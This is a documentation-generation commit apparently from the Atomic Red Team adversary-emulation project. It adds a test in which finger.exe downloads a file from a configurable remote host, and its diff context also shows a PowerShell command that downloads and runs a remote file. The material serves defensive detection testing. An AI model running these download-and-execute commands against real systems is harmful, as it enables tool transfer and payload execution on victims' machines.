Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2021-07-28 22:27:19 +00:00
parent fa11adb617
commit 6bd522644a
6 changed files with 61 additions and 0 deletions
@@ -866,6 +866,7 @@ command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a U
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
+command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -531,6 +531,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
+command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
@@ -1565,6 +1565,7 @@
  - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
  - Atomic Test #14: whois file download [linux, macos]
  - Atomic Test #15: File Download via PowerShell [windows]
+  - Atomic Test #16: File download with finger.exe on Windows [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [macos, linux]
  - Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -963,6 +963,7 @@
  - Atomic Test #12: svchost writing a file to a UNC path [windows]
  - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
  - Atomic Test #15: File Download via PowerShell [windows]
+  - Atomic Test #16: File download with finger.exe on Windows [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #3: portproxy reg key [windows]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -65396,6 +65396,25 @@ command-and-control:
        command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}')
          | Out-File #{output_file}; Invoke-Item #{output_file}\n"
        name: powershell
+    - name: File download with finger.exe on Windows
+      auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01
+      description: |
+        Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server.
+        Because this is being tested on the localhost, you should not be expecting a successful connection
+        https://www.exploit-db.com/exploits/48815
+        https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_host:
+          description: Remote hostname or IP address
+          type: String
+          default: localhost
+      executor:
+        name: command_prompt
+        command: 'finger base64_filedata@#{remote_host}
+
+'
  T1090.001:
    technique:
      external_references:
@@ -34,6 +34,8 @@

 - [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell)

+- [Atomic Test #16 - File download with finger.exe on Windows](#atomic-test-16---file-download-with-fingerexe-on-windows)
+

 <br/>

@@ -625,4 +627,40 @@ Use PowerShell to download and write an arbitrary file from the internet. Exampl



+<br/>
+<br/>
+
+## Atomic Test #16 - File download with finger.exe on Windows
+Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server.
+Because this is being tested on the localhost, you should not be expecting a successful connection
+https://www.exploit-db.com/exploits/48815
+https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5f507e45-8411-4f99-84e7-e38530c45d01
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_host | Remote hostname or IP address | String | localhost|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+finger base64_filedata@#{remote_host}
+```
+
+
+
+
+
+
 <br/>